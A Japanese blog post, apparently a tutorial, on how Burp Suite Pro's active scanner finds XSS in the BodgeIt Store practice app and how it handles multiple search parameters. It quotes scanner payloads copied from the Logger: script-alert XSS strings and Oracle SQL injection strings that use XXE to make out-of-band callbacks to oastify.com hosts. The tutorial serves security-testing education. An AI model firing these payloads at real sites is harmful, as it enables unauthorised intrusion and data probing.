Hello there, ('ω')ノ
Burp Suiteのアクティブスキャンは、Pro版での機能となりますが。
まずは、BodgeIt Storeを起動して。

起動時のサイトマップは以下のとおりで。

検索メニューでキーワードなしで検索を。

すべての情報が結果表示されて。

サイトマップには、使用したパラメータが追加されて。

次にパラメータを入力しての検索を。

何も見つからず。

サイトマップには、さらにパラメータが追加されて。

もうひとつ、ヒットするキーワードで検索して。


検索したキーワードがパラメータとして追加されて。

ここでsearch.jspに対してアクティブスキャンを。

XSSの脆弱性が一件結果として表示されて。
ここでの注目は、3つのパラメータ毎に結果は表示されない点で。
どれか1つのパラメータでXSSの脆弱性が発見されたら重複して表示されず。
これはこれで当たり前の仕様で。
パラメータ分、同じ脆弱性の結果が表示されると紛らわしいので。

では、アクティブスキャンの詳細をLoggerで確認してみることに。
XSSが見つかったペイロードは以下のとおりなのでフィルタをかけてみると。
%3cscript%3ealert(1)%3c%2fscript%3e

3件がヒットして。
各パラメータを確認してみると。
冒頭で確認した3つのパラメータ毎にパラメータ後方にペイロードが挿入されていて。
つまり、Issuseには1つのパラメータについてのみ表示されていますが。
実際には、3つのパラメータについてしっかりと診断は行っていて。
safhr<script>alert(1)</script>orx79

Thingieskbpm5<script>alert(1)</script>bndhk

testn0jbk<script>alert(1)</script>tkuuh

ちなみに他にどのようなペイロードが挿入されているかを確認することに。
SQLインジェクションを試していると思われるペイロードについても。
3つのパラメータについて確認されていて。
(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY % krgfq SYSTEM "http://8w5c4e46v2ya27fi81fsoemwknqhea2dq4du1j.oasti'||'fy.com/">
%krgfq;]>'),'/l') from dual)

Thingies'||
(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY % mlddc SYSTEM "http://cgwgoioaf6iembzms5zw8i604ralydmha8xyln.oasti'||'fy.com/">
%mlddc;]>'),'/l') from dual)||'

test'||
(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [ <!ENTITY % krgfq SYSTEM "http://716b9d95013976khd0krtdrvpmvgj97dv4iu6j.oasti'||'fy.com/">
%krgfq;]>'),'/l') from dual)||'

再度、まっさらな状態で検索もせずにそのままアクティブスキャンを。

Burp Suiteはパラメータがわからないため。
パラメータに対してのペイロードは挿入できないため。
さきほど検出されたXSSの脆弱性は表示されず。

Loggerで、フィルタをかけて。

パラメータを確認しても、見たこともないパラメータに対して診断したりと。
かるく確認した限りでは、ペイロードは挿入していないようで。

このようにアクティブスキャンという機能を備えていても。
ツールの機能を熟知していなかったら十分に機能を使いこなせなかったりと。
Best regards, (^^ゞ